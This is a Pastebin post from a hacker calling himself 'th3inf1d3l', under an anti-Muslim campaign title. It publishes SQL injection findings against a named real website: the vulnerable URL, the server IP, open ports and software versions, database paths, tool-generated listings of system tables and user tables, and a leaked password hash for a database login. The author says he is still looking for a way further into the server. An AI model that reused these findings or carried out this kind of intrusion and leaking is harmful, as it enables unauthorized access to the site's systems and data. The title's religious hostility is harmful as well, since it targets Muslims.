Advertisement
th3inf1d3l

OpFuckMohammad islamtoday.net

Sep 30th, 2012
305
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 41.96 KB | None | 0 0
  1. OPFuckMohammad
  2.  
  3. Greetings from th3inf1d3l - SQLi found on http://magazine.islamtoday.net/adad.aspx?id=33. Still working on enumerating I2D_MAGAZINE.MDF. To date have found (see below) passwords hashes for sa account et al and 16 sysuser accounts with NULL passwords. Just need to find the port (if any) they mssql listening on.
  4.  
  5. 206.217.220.127
  6. web server operating system: Windows 2003
  7. web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
  8. back-end DBMS: Microsoft SQL Server 2008
  9.  
  10. PORT STATE SERVICE VERSION
  11. 21/tcp open ftp FileZilla ftpd
  12. 80/tcp open http Microsoft IIS webserver 6.0
  13.  
  14.  
  15. current database: 'D:\WEB\MAGAZINE.ISLAMTODAY.NET\APP_DATA\I2D_MAGAZINE.MDF'
  16. current user: 'NT AUTHORITY\NETWORK SERVICE'
  17.  
  18. DATABASES
  19. D:\WEB\MAGAZINE.ISLAMTODAY.NET\APP_DATA\I2D_MAGAZINE.MDF
  20. D:\WEB\NAMA-CENTER.COM\APP_DATA\NAMADB.MDF
  21. D:\WEB\NAMA-CENTER.COM\APP_DATA\NAMADB2.MDF
  22. D:\WEB\SMS.ISLAMTODAY.NET\APP_DATA\DATABASE.MDF
  23. master
  24. model
  25. msdb
  26. tempdb
  27.  
  28. Database: master
  29. [360 tables]
  30. +---------------------------------------------------+
  31. | INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
  32. | INFORMATION_SCHEMA.COLUMNS |
  33. | INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
  34. | INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
  35. | INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
  36. | INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
  37. | INFORMATION_SCHEMA.DOMAINS |
  38. | INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
  39. | INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
  40. | INFORMATION_SCHEMA.PARAMETERS |
  41. | INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
  42. | INFORMATION_SCHEMA.ROUTINES |
  43. | INFORMATION_SCHEMA.ROUTINE_COLUMNS |
  44. | INFORMATION_SCHEMA.SCHEMATA |
  45. | INFORMATION_SCHEMA.TABLES |
  46. | INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
  47. | INFORMATION_SCHEMA.TABLE_PRIVILEGES |
  48. | INFORMATION_SCHEMA.VIEWS |
  49. | INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
  50. | INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
  51. | dbo.MSreplication_options |
  52. | dbo.spt_fallback_db |
  53. | dbo.spt_fallback_dev |
  54. | dbo.spt_fallback_usg |
  55. | dbo.spt_monitor |
  56. | dbo.spt_values |
  57. | sys.all_columns |
  58. | sys.all_objects |
  59. | sys.all_parameters |
  60. | sys.all_sql_modules |
  61. | sys.all_views |
  62. | sys.allocation_units |
  63. | sys.assemblies |
  64. | sys.assembly_files |
  65. | sys.assembly_modules |
  66. | sys.assembly_references |
  67. | sys.assembly_types |
  68. | sys.asymmetric_keys |
  69. | sys.backup_devices |
  70. | sys.certificates |
  71. | sys.change_tracking_databases |
  72. | sys.change_tracking_tables |
  73. | sys.check_constraints |
  74. | sys.column_type_usages |
  75. | sys.column_xml_schema_collection_usages |
  76. | sys.columns |
  77. | sys.computed_columns |
  78. | sys.configurations |
  79. | sys.conversation_endpoints |
  80. | sys.conversation_groups |
  81. | sys.conversation_priorities |
  82. | sys.credentials |
  83. | sys.crypt_properties |
  84. | sys.cryptographic_providers |
  85. | sys.data_spaces |
  86. | sys.database_audit_specification_details |
  87. | sys.database_audit_specifications |
  88. | sys.database_files |
  89. | sys.database_mirroring |
  90. | sys.database_mirroring_endpoints |
  91. | sys.database_mirroring_witnesses |
  92. | sys.database_permissions |
  93. | sys.database_principal_aliases |
  94. | sys.database_principals |
  95. | sys.database_recovery_status |
  96. | sys.database_role_members |
  97. | sys.databases |
  98. | sys.default_constraints |
  99. | sys.destination_data_spaces |
  100. | sys.dm_audit_actions |
  101. | sys.dm_audit_class_type_map |
  102. | sys.dm_broker_activated_tasks |
  103. | sys.dm_broker_connections |
  104. | sys.dm_broker_forwarded_messages |
  105. | sys.dm_broker_queue_monitors |
  106. | sys.dm_cdc_errors |
  107. | sys.dm_cdc_log_scan_sessions |
  108. | sys.dm_clr_appdomains |
  109. | sys.dm_clr_loaded_assemblies |
  110. | sys.dm_clr_properties |
  111. | sys.dm_clr_tasks |
  112. | sys.dm_cryptographic_provider_properties |
  113. | sys.dm_database_encryption_keys |
  114. | sys.dm_db_file_space_usage |
  115. | sys.dm_db_index_usage_stats |
  116. | sys.dm_db_mirroring_auto_page_repair |
  117. | sys.dm_db_mirroring_connections |
  118. | sys.dm_db_mirroring_past_actions |
  119. | sys.dm_db_missing_index_details |
  120. | sys.dm_db_missing_index_group_stats |
  121. | sys.dm_db_missing_index_groups |
  122. | sys.dm_db_partition_stats |
  123. | sys.dm_db_persisted_sku_features |
  124. | sys.dm_db_script_level |
  125. | sys.dm_db_session_space_usage |
  126. | sys.dm_db_task_space_usage |
  127. | sys.dm_exec_background_job_queue |
  128. | sys.dm_exec_background_job_queue_stats |
  129. | sys.dm_exec_cached_plans |
  130. | sys.dm_exec_connections |
  131. | sys.dm_exec_procedure_stats |
  132. | sys.dm_exec_query_memory_grants |
  133. | sys.dm_exec_query_optimizer_info |
  134. | sys.dm_exec_query_resource_semaphores |
  135. | sys.dm_exec_query_stats |
  136. | sys.dm_exec_query_transformation_stats |
  137. | sys.dm_exec_requests |
  138. | sys.dm_exec_sessions |
  139. | sys.dm_exec_trigger_stats |
  140. | sys.dm_filestream_file_io_handles |
  141. | sys.dm_filestream_file_io_requests |
  142. | sys.dm_fts_active_catalogs |
  143. | sys.dm_fts_fdhosts |
  144. | sys.dm_fts_index_population |
  145. | sys.dm_fts_memory_buffers |
  146. | sys.dm_fts_memory_pools |
  147. | sys.dm_fts_outstanding_batches |
  148. | sys.dm_fts_population_ranges |
  149. | sys.dm_io_backup_tapes |
  150. | sys.dm_io_cluster_shared_drives |
  151. | sys.dm_io_pending_io_requests |
  152. | sys.dm_os_buffer_descriptors |
  153. | sys.dm_os_child_instances |
  154. | sys.dm_os_cluster_nodes |
  155. | sys.dm_os_dispatcher_pools |
  156. | sys.dm_os_dispatchers |
  157. | sys.dm_os_hosts |
  158. | sys.dm_os_latch_stats |
  159. | sys.dm_os_loaded_modules |
  160. | sys.dm_os_memory_allocations |
  161. | sys.dm_os_memory_brokers |
  162. | sys.dm_os_memory_cache_clock_hands |
  163. | sys.dm_os_memory_cache_counters |
  164. | sys.dm_os_memory_cache_entries |
  165. | sys.dm_os_memory_cache_hash_tables |
  166. | sys.dm_os_memory_clerks |
  167. | sys.dm_os_memory_node_access_stats |
  168. | sys.dm_os_memory_nodes |
  169. | sys.dm_os_memory_objects |
  170. | sys.dm_os_memory_pools |
  171. | sys.dm_os_nodes |
  172. | sys.dm_os_performance_counters |
  173. | sys.dm_os_process_memory |
  174. | sys.dm_os_ring_buffers |
  175. | sys.dm_os_schedulers |
  176. | sys.dm_os_spinlock_stats |
  177. | sys.dm_os_stacks |
  178. | sys.dm_os_sublatches |
  179. | sys.dm_os_sys_info |
  180. | sys.dm_os_sys_memory |
  181. | sys.dm_os_tasks |
  182. | sys.dm_os_threads |
  183. | sys.dm_os_virtual_address_dump |
  184. | sys.dm_os_wait_stats |
  185. | sys.dm_os_waiting_tasks |
  186. | sys.dm_os_worker_local_storage |
  187. | sys.dm_os_workers |
  188. | sys.dm_qn_subscriptions |
  189. | sys.dm_repl_articles |
  190. | sys.dm_repl_schemas |
  191. | sys.dm_repl_tranhash |
  192. | sys.dm_repl_traninfo |
  193. | sys.dm_resource_governor_configuration |
  194. | sys.dm_resource_governor_resource_pools |
  195. | sys.dm_resource_governor_workload_groups |
  196. | sys.dm_server_audit_status |
  197. | sys.dm_tran_active_snapshot_database_transactions |
  198. | sys.dm_tran_active_transactions |
  199. | sys.dm_tran_commit_table |
  200. | sys.dm_tran_current_snapshot |
  201. | sys.dm_tran_current_transaction |
  202. | sys.dm_tran_database_transactions |
  203. | sys.dm_tran_locks |
  204. | sys.dm_tran_session_transactions |
  205. | sys.dm_tran_top_version_generators |
  206. | sys.dm_tran_transactions_snapshot |
  207. | sys.dm_tran_version_store |
  208. | sys.dm_xe_map_values |
  209. | sys.dm_xe_object_columns |
  210. | sys.dm_xe_objects |
  211. | sys.dm_xe_packages |
  212. | sys.dm_xe_session_event_actions |
  213. | sys.dm_xe_session_events |
  214. | sys.dm_xe_session_object_columns |
  215. | sys.dm_xe_session_targets |
  216. | sys.dm_xe_sessions |
  217. | sys.endpoint_webmethods |
  218. | sys.endpoints |
  219. | sys.event_notification_event_types |
  220. | sys.event_notifications |
  221. | sys.events |
  222. | sys.extended_procedures |
  223. | sys.extended_properties |
  224. | sys.filegroups |
  225. | sys.foreign_key_columns |
  226. | sys.foreign_keys |
  227. | sys.fulltext_catalogs |
  228. | sys.fulltext_document_types |
  229. | sys.fulltext_index_catalog_usages |
  230. | sys.fulltext_index_columns |
  231. | sys.fulltext_index_fragments |
  232. | sys.fulltext_indexes |
  233. | sys.fulltext_languages |
  234. | sys.fulltext_stoplists |
  235. | sys.fulltext_stopwords |
  236. | sys.fulltext_system_stopwords |
  237. | sys.function_order_columns |
  238. | sys.http_endpoints |
  239. | sys.identity_columns |
  240. | sys.index_columns |
  241. | sys.indexes |
  242. | sys.internal_tables |
  243. | sys.key_constraints |
  244. | sys.key_encryptions |
  245. | sys.linked_logins |
  246. | sys.login_token |
  247. | sys.master_files |
  248. | sys.master_key_passwords |
  249. | sys.message_type_xml_schema_collection_usages |
  250. | sys.messages |
  251. | sys.module_assembly_usages |
  252. | sys.numbered_procedure_parameters |
  253. | sys.numbered_procedures |
  254. | sys.objects |
  255. | sys.openkeys |
  256. | sys.parameter_type_usages |
  257. | sys.parameter_xml_schema_collection_usages |
  258. | sys.parameters |
  259. | sys.partition_functions |
  260. | sys.partition_parameters |
  261. | sys.partition_range_values |
  262. | sys.partition_schemes |
  263. | sys.partitions |
  264. | sys.plan_guides |
  265. | sys.procedures |
  266. | sys.remote_logins |
  267. | sys.remote_service_bindings |
  268. | sys.resource_governor_configuration |
  269. | sys.resource_governor_resource_pools |
  270. | sys.resource_governor_workload_groups |
  271. | sys.routes |
  272. | sys.schemas |
  273. | sys.securable_classes |
  274. | sys.server_assembly_modules |
  275. | sys.server_audit_specification_details |
  276. | sys.server_audit_specifications |
  277. | sys.server_audits |
  278. | sys.server_event_notifications |
  279. | sys.server_event_session_actions |
  280. | sys.server_event_session_events |
  281. | sys.server_event_session_fields |
  282. | sys.server_event_session_targets |
  283. | sys.server_event_sessions |
  284. | sys.server_events |
  285. | sys.server_file_audits |
  286. | sys.server_permissions |
  287. | sys.server_principal_credentials |
  288. | sys.server_principals |
  289. | sys.server_role_members |
  290. | sys.server_sql_modules |
  291. | sys.server_trigger_events |
  292. | sys.server_triggers |
  293. | sys.servers |
  294. | sys.service_broker_endpoints |
  295. | sys.service_contract_message_usages |
  296. | sys.service_contract_usages |
  297. | sys.service_contracts |
  298. | sys.service_message_types |
  299. | sys.service_queue_usages |
  300. | sys.service_queues |
  301. | sys.services |
  302. | sys.soap_endpoints |
  303. | sys.spatial_index_tessellations |
  304. | sys.spatial_indexes |
  305. | sys.spatial_reference_systems |
  306. | sys.sql_dependencies |
  307. | sys.sql_expression_dependencies |
  308. | sys.sql_logins |
  309. | sys.sql_modules |
  310. | sys.stats |
  311. | sys.stats_columns |
  312. | sys.symmetric_keys |
  313. | sys.synonyms |
  314. | sys.sysaltfiles |
  315. | sys.syscacheobjects |
  316. | sys.syscharsets |
  317. | sys.syscolumns |
  318. | sys.syscomments |
  319. | sys.sysconfigures |
  320. | sys.sysconstraints |
  321. | sys.syscurconfigs |
  322. | sys.syscursorcolumns |
  323. | sys.syscursorrefs |
  324. | sys.syscursors |
  325. | sys.syscursortables |
  326. | sys.sysdatabases |
  327. | sys.sysdepends |
  328. | sys.sysdevices |
  329. | sys.sysfilegroups |
  330. | sys.sysfiles |
  331. | sys.sysforeignkeys |
  332. | sys.sysfulltextcatalogs |
  333. | sys.sysindexes |
  334. | sys.sysindexkeys |
  335. | sys.syslanguages |
  336. | sys.syslockinfo |
  337. | sys.syslogins |
  338. | sys.sysmembers |
  339. | sys.sysmessages |
  340. | sys.sysobjects |
  341. | sys.sysoledbusers |
  342. | sys.sysopentapes |
  343. | sys.sysperfinfo |
  344. | sys.syspermissions |
  345. | sys.sysprocesses |
  346. | sys.sysprotects |
  347. | sys.sysreferences |
  348. | sys.sysremotelogins |
  349. | sys.sysservers |
  350. | sys.system_columns |
  351. | sys.system_components_surface_area_configuration |
  352. | sys.system_internals_allocation_units |
  353. | sys.system_internals_partition_columns |
  354. | sys.system_internals_partitions |
  355. | sys.system_objects |
  356. | sys.system_parameters |
  357. | sys.system_sql_modules |
  358. | sys.system_views |
  359. | sys.systypes |
  360. | sys.sysusers |
  361. | sys.table_types |
  362. | sys.tables |
  363. | sys.tcp_endpoints |
  364. | sys.trace_categories |
  365. | sys.trace_columns |
  366. | sys.trace_event_bindings |
  367. | sys.trace_events |
  368. | sys.trace_subclass_values |
  369. | sys.traces |
  370. | sys.transmission_queue |
  371. | sys.trigger_event_types |
  372. | sys.trigger_events |
  373. | sys.triggers |
  374. | sys.type_assembly_usages |
  375. | sys.types |
  376. | sys.user_token |
  377. | sys.via_endpoints |
  378. | sys.views |
  379. | sys.xml_indexes |
  380. | sys.xml_schema_attributes |
  381. | sys.xml_schema_collections |
  382. | sys.xml_schema_component_placements |
  383. | sys.xml_schema_components |
  384. | sys.xml_schema_elements |
  385. | sys.xml_schema_facets |
  386. | sys.xml_schema_model_groups |
  387. | sys.xml_schema_namespaces |
  388. | sys.xml_schema_types |
  389. | sys.xml_schema_wildcard_namespaces |
  390. | sys.xml_schema_wildcards |
  391. +---------------------------------------------------+
  392.  
  393. Database: msdb
  394. [219 tables]
  395. +---------------------------------------------------------------+
  396. | dbo.MSdatatype_mappings |
  397. | dbo.MSdbms |
  398. | dbo.MSdbms_datatype |
  399. | dbo.MSdbms_datatype_mapping |
  400. | dbo.MSdbms_map |
  401. | dbo.backupfile |
  402. | dbo.backupfilegroup |
  403. | dbo.backupmediafamily |
  404. | dbo.backupmediaset |
  405. | dbo.backupset |
  406. | dbo.log_shipping_monitor_alert |
  407. | dbo.log_shipping_monitor_error_detail |
  408. | dbo.log_shipping_monitor_history_detail |
  409. | dbo.log_shipping_monitor_primary |
  410. | dbo.log_shipping_monitor_secondary |
  411. | dbo.log_shipping_primaries |
  412. | dbo.log_shipping_primary_databases |
  413. | dbo.log_shipping_primary_secondaries |
  414. | dbo.log_shipping_secondaries |
  415. | dbo.log_shipping_secondary |
  416. | dbo.log_shipping_secondary_databases |
  417. | dbo.logmarkhistory |
  418. | dbo.restorefile |
  419. | dbo.restorefilegroup |
  420. | dbo.restorehistory |
  421. | dbo.sqlagent_info |
  422. | dbo.suspect_pages |
  423. | dbo.sysalerts |
  424. | dbo.syscachedcredentials |
  425. | dbo.syscategories |
  426. | dbo.syscollector_blobs_internal |
  427. | dbo.syscollector_collection_items |
  428. | dbo.syscollector_collection_items_internal |
  429. | dbo.syscollector_collection_sets |
  430. | dbo.syscollector_collection_sets_internal |
  431. | dbo.syscollector_collector_types |
  432. | dbo.syscollector_collector_types_internal |
  433. | dbo.syscollector_config_store |
  434. | dbo.syscollector_config_store_internal |
  435. | dbo.syscollector_execution_log |
  436. | dbo.syscollector_execution_log_full |
  437. | dbo.syscollector_execution_log_internal |
  438. | dbo.syscollector_execution_stats |
  439. | dbo.syscollector_execution_stats_internal |
  440. | dbo.syscollector_tsql_query_collector |
  441. | dbo.sysdac_history_internal |
  442. | dbo.sysdac_instances |
  443. | dbo.sysdac_instances_internal |
  444. | dbo.sysdatatypemappings |
  445. | dbo.sysdbmaintplan_databases |
  446. | dbo.sysdbmaintplan_history |
  447. | dbo.sysdbmaintplan_jobs |
  448. | dbo.sysdbmaintplans |
  449. | dbo.sysdownloadlist |
  450. | dbo.sysdtscategories |
  451. | dbo.sysdtspackagelog |
  452. | dbo.sysdtspackages |
  453. | dbo.sysdtssteplog |
  454. | dbo.sysdtstasklog |
  455. | dbo.sysjobactivity |
  456. | dbo.sysjobhistory |
  457. | dbo.sysjobs |
  458. | dbo.sysjobs_view |
  459. | dbo.sysjobschedules |
  460. | dbo.sysjobservers |
  461. | dbo.sysjobsteps |
  462. | dbo.sysjobstepslogs |
  463. | dbo.sysmail_account |
  464. | dbo.sysmail_allitems |
  465. | dbo.sysmail_attachments |
  466. | dbo.sysmail_attachments_transfer |
  467. | dbo.sysmail_configuration |
  468. | dbo.sysmail_event_log |
  469. | dbo.sysmail_faileditems |
  470. | dbo.sysmail_log |
  471. | dbo.sysmail_mailattachments |
  472. | dbo.sysmail_mailitems |
  473. | dbo.sysmail_principalprofile |
  474. | dbo.sysmail_profile |
  475. | dbo.sysmail_profileaccount |
  476. | dbo.sysmail_query_transfer |
  477. | dbo.sysmail_send_retries |
  478. | dbo.sysmail_sentitems |
  479. | dbo.sysmail_server |
  480. | dbo.sysmail_servertype |
  481. | dbo.sysmail_unsentitems |
  482. | dbo.sysmaintplan_log |
  483. | dbo.sysmaintplan_logdetail |
  484. | dbo.sysmaintplan_plans |
  485. | dbo.sysmaintplan_subplans |
  486. | dbo.sysmanagement_shared_registered_servers |
  487. | dbo.sysmanagement_shared_registered_servers_internal |
  488. | dbo.sysmanagement_shared_server_groups |
  489. | dbo.sysmanagement_shared_server_groups_internal |
  490. | dbo.sysnotifications |
  491. | dbo.sysoperators |
  492. | dbo.sysoriginatingservers |
  493. | dbo.sysoriginatingservers_view |
  494. | dbo.syspolicy_conditions |
  495. | dbo.syspolicy_conditions_internal |
  496. | dbo.syspolicy_configuration |
  497. | dbo.syspolicy_configuration_internal |
  498. | dbo.syspolicy_execution_internal |
  499. | dbo.syspolicy_facet_events |
  500. | dbo.syspolicy_management_facets |
  501. | dbo.syspolicy_object_sets |
  502. | dbo.syspolicy_object_sets_internal |
  503. | dbo.syspolicy_policies |
  504. | dbo.syspolicy_policies_internal |
  505. | dbo.syspolicy_policy_categories |
  506. | dbo.syspolicy_policy_categories_internal |
  507. | dbo.syspolicy_policy_category_subscriptions |
  508. | dbo.syspolicy_policy_category_subscriptions_internal |
  509. | dbo.syspolicy_policy_execution_history |
  510. | dbo.syspolicy_policy_execution_history_details |
  511. | dbo.syspolicy_policy_execution_history_details_internal |
  512. | dbo.syspolicy_policy_execution_history_internal |
  513. | dbo.syspolicy_system_health_state |
  514. | dbo.syspolicy_system_health_state_internal |
  515. | dbo.syspolicy_target_set_levels |
  516. | dbo.syspolicy_target_set_levels_internal |
  517. | dbo.syspolicy_target_sets |
  518. | dbo.syspolicy_target_sets_internal |
  519. | dbo.sysproxies |
  520. | dbo.sysproxylogin |
  521. | dbo.sysproxyloginsubsystem_view |
  522. | dbo.sysproxysubsystem |
  523. | dbo.sysschedules |
  524. | dbo.sysschedules_localserver_view |
  525. | dbo.syssessions |
  526. | dbo.sysssislog |
  527. | dbo.sysssispackagefolders |
  528. | dbo.sysssispackages |
  529. | dbo.syssubsystems |
  530. | dbo.systargetservergroupmembers |
  531. | dbo.systargetservergroups |
  532. | dbo.systargetservers |
  533. | dbo.systargetservers_view |
  534. | dbo.systaskids |
  535. | dbo.sysutility_mi_configuration |
  536. | dbo.sysutility_mi_configuration_internal |
  537. | dbo.sysutility_mi_cpu_stage_internal |
  538. | dbo.sysutility_mi_dac_execution_statistics_internal |
  539. | dbo.sysutility_mi_session_statistics_internal |
  540. | dbo.sysutility_mi_smo_objects_to_collect_internal |
  541. | dbo.sysutility_mi_smo_properties_to_collect_internal |
  542. | dbo.sysutility_mi_smo_stage_internal |
  543. | dbo.sysutility_mi_volumes_stage_internal |
  544. | dbo.sysutility_ucp_aggregated_dac_health |
  545. | dbo.sysutility_ucp_aggregated_dac_health_internal |
  546. | dbo.sysutility_ucp_aggregated_mi_health |
  547. | dbo.sysutility_ucp_aggregated_mi_health_internal |
  548. | dbo.sysutility_ucp_computer_cpu_health |
  549. | dbo.sysutility_ucp_computer_cpu_health_internal |
  550. | dbo.sysutility_ucp_computer_cpu_utilization |
  551. | dbo.sysutility_ucp_computer_cpu_utilizations |
  552. | dbo.sysutility_ucp_computer_policies |
  553. | dbo.sysutility_ucp_computers |
  554. | dbo.sysutility_ucp_computers_stub |
  555. | dbo.sysutility_ucp_configuration |
  556. | dbo.sysutility_ucp_configuration_internal |
  557. | dbo.sysutility_ucp_cpu_utilization_stub |
  558. | dbo.sysutility_ucp_dac_cpu_utilization |
  559. | dbo.sysutility_ucp_dac_cpu_utilizations |
  560. | dbo.sysutility_ucp_dac_database_file_space_health |
  561. | dbo.sysutility_ucp_dac_database_file_space_utilizations |
  562. | dbo.sysutility_ucp_dac_file_space_health_internal |
  563. | dbo.sysutility_ucp_dac_health |
  564. | dbo.sysutility_ucp_dac_health_internal |
  565. | dbo.sysutility_ucp_dac_policies |
  566. | dbo.sysutility_ucp_dac_policy_type |
  567. | dbo.sysutility_ucp_dac_volume_space_utilizations |
  568. | dbo.sysutility_ucp_dacs_stub |
  569. | dbo.sysutility_ucp_database_files |
  570. | dbo.sysutility_ucp_databases |
  571. | dbo.sysutility_ucp_databases_stub |
  572. | dbo.sysutility_ucp_datafiles |
  573. | dbo.sysutility_ucp_datafiles_stub |
  574. | dbo.sysutility_ucp_deployed_dacs |
  575. | dbo.sysutility_ucp_filegroups |
  576. | dbo.sysutility_ucp_filegroups_stub |
  577. | dbo.sysutility_ucp_filegroups_with_policy_violations_internal |
  578. | dbo.sysutility_ucp_health_policies_internal |
  579. | dbo.sysutility_ucp_instance_cpu_utilization |
  580. | dbo.sysutility_ucp_instance_policies |
  581. | dbo.sysutility_ucp_instance_policy_type |
  582. | dbo.sysutility_ucp_instances |
  583. | dbo.sysutility_ucp_logfiles |
  584. | dbo.sysutility_ucp_logfiles_stub |
  585. | dbo.sysutility_ucp_managed_instances |
  586. | dbo.sysutility_ucp_managed_instances_internal |
  587. | dbo.sysutility_ucp_mi_cpu_utilizations |
  588. | dbo.sysutility_ucp_mi_database_file_space_utilizations |
  589. | dbo.sysutility_ucp_mi_database_health |
  590. | dbo.sysutility_ucp_mi_database_health_internal |
  591. | dbo.sysutility_ucp_mi_file_space_health |
  592. | dbo.sysutility_ucp_mi_file_space_health_internal |
  593. | dbo.sysutility_ucp_mi_health |
  594. | dbo.sysutility_ucp_mi_health_internal |
  595. | dbo.sysutility_ucp_mi_volume_space_health |
  596. | dbo.sysutility_ucp_mi_volume_space_health_internal |
  597. | dbo.sysutility_ucp_mi_volume_space_utilizations |
  598. | dbo.sysutility_ucp_policies |
  599. | dbo.sysutility_ucp_policy_check_conditions |
  600. | dbo.sysutility_ucp_policy_check_conditions_internal |
  601. | dbo.sysutility_ucp_policy_configuration |
  602. | dbo.sysutility_ucp_policy_target_conditions |
  603. | dbo.sysutility_ucp_policy_target_conditions_internal |
  604. | dbo.sysutility_ucp_policy_violations |
  605. | dbo.sysutility_ucp_policy_violations_internal |
  606. | dbo.sysutility_ucp_processing_state_internal |
  607. | dbo.sysutility_ucp_smo_servers_stub |
  608. | dbo.sysutility_ucp_snapshot_partitions_internal |
  609. | dbo.sysutility_ucp_space_utilization_stub |
  610. | dbo.sysutility_ucp_supported_object_types_internal |
  611. | dbo.sysutility_ucp_utility_space_utilization |
  612. | dbo.sysutility_ucp_volume_powershell_path |
  613. | dbo.sysutility_ucp_volumes |
  614. | dbo.sysutility_ucp_volumes_stub |
  615. +---------------------------------------------------------------+
  616.  
  617. Database: master
  618. Table: dbo.sysusers
  619. [20 columns]
  620. +-------------+----------+
  621. | Column | Type |
  622. +-------------+----------+
  623. | altuid | datetime |
  624. | createdate | datetime |
  625. | environ | datetime |
  626. | gid | datetime |
  627. | hasdbaccess | datetime |
  628. | isaliased | datetime |
  629. | isapprole | datetime |
  630. | islogin | datetime |
  631. | isntgroup | datetime |
  632. | isntname | datetime |
  633. | isntuser | datetime |
  634. | issqlrole | datetime |
  635. | issqluser | datetime |
  636. | name | datetime |
  637. | password | datetime |
  638. | roles | datetime |
  639. | sid | datetime |
  640. | status | datetime |
  641. | uid | datetime |
  642. | updatedate | datetime |
  643. +-------------+----------+
  644.  
  645. Database: master
  646. Table: dbo.sysusers
  647. [16 entries]
  648. +--------+---------------------+---------+-------+-------------+-----------+-----------+---------+-----------+----------+----------+-----------+-----------+-----------------------------------+----------+-------+--------------------+--------+-------+---------------------+
  649. | altuid | createdate | environ | gid | hasdbaccess | isaliased | isapprole | islogin | isntgroup | isntname | isntuser | issqlrole | issqluser | name | password | roles | sid | status | uid | updatedate |
  650. +--------+---------------------+---------+-------+-------------+-----------+-----------+---------+-----------+----------+----------+-----------+-----------+-----------------------------------+----------+-------+--------------------+--------+-------+---------------------+
  651. | NULL | Apr 2 2010 5:38PM | NULL | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | ##MS_AgentSigningCertificate## | NULL | NULL | ؁..ऀ\01.ᅆ疄ዶ鈯塚ࣷ뇠垳 | 0 | 6 | Apr 2 2010 5:38PM |
  652. | NULL | Apr 2 2010 5:37PM | NULL | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | ##MS_PolicyEventProcessingLogin## | NULL | NULL | 꽎䵔唉䅰퇉ꘃ | 0 | 5 | Apr 2 2010 5:37PM |
  653. | 1 | Apr 8 2003 9:10AM | NULL | 16385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_accessadmin | NULL | NULL | ԁ..ऀ\04.......䀁. | 0 | 16385 | Apr 2 2010 4:59PM |
  654. | 1 | Apr 8 2003 9:10AM | NULL | 16389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_backupoperator | NULL | NULL | ԁ..ऀ\04.......䀅. | 0 | 16389 | Apr 2 2010 4:59PM |
  655. | 1 | Apr 8 2003 9:10AM | NULL | 16390 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_datareader | NULL | NULL | ԁ..ऀ\04.......䀆. | 0 | 16390 | Apr 2 2010 4:59PM |
  656. | 1 | Apr 8 2003 9:10AM | NULL | 16391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_datawriter | NULL | NULL | ԁ..ऀ\04.......䀇. | 0 | 16391 | Apr 2 2010 4:59PM |
  657. | 1 | Apr 8 2003 9:10AM | NULL | 16387 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_ddladmin | NULL | NULL | ԁ..ऀ\04.......䀃. | 0 | 16387 | Apr 2 2010 4:59PM |
  658. | 1 | Apr 8 2003 9:10AM | NULL | 16392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_denydatareader | NULL | NULL | ԁ..ऀ\04.......䀈. | 0 | 16392 | Apr 2 2010 4:59PM |
  659. | 1 | Apr 8 2003 9:10AM | NULL | 16393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_denydatawriter | NULL | NULL | ԁ..ऀ\04.......䀉. | 0 | 16393 | Apr 2 2010 4:59PM |
  660. | 1 | Apr 8 2003 9:10AM | NULL | 16384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_owner | NULL | NULL | ԁ..ऀ\04.......䀀. | 0 | 16384 | Apr 2 2010 4:59PM |
  661. | 1 | Apr 8 2003 9:10AM | NULL | 16386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | db_securityadmin | NULL | NULL | ԁ..ऀ\04.......䀂. | 0 | 16386 | Apr 2 2010 4:59PM |
  662. | NULL | Apr 8 2003 9:10AM | NULL | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | dbo | NULL | NULL | \01 | 0 | 1 | Apr 8 2003 9:10AM |
  663. | NULL | Apr 8 2003 9:10AM | NULL | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | guest | NULL | NULL | . | 0 | 2 | Apr 8 2003 9:10AM |
  664. | NULL | Apr 2 2010 4:59PM | NULL | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | INFORMATION_SCHEMA | NULL | NULL | NULL | 0 | 3 | Apr 2 2010 4:59PM |
  665. | 1 | Apr 8 2003 9:10AM | NULL | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | public | NULL | NULL | ԁ..ऀ\04.ᩇ걒怮䠕肊㜣�噒 | 0 | 0 | Apr 2 2010 4:59PM |
  666. | NULL | Apr 2 2010 4:59PM | NULL | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | sys | NULL | NULL | NULL | 0 | 4 | Apr 2 2010 4:59PM |
  667. +--------+---------------------+---------+-------+-------------+-----------+-----------+---------+-----------+----------+----------+-----------+-----------+-----------------------------------+----------+-------+--------------------+--------+-------+---------------------+
  668.  
  669. database management system users [3]:
  670. [*] ##MS_PolicyEventProcessingLogin##
  671. [*] ##MS_PolicyTsqlExecutionLogin##
  672. [*] sa
  673.  
  674. database management system users password hashes:
  675. [*] ##MS_PolicyEventProcessingLogin## [1]:
  676. password hash: 0x01006a2b76b9942b199cf1023a83dd09fae3feaedcec18fd1780
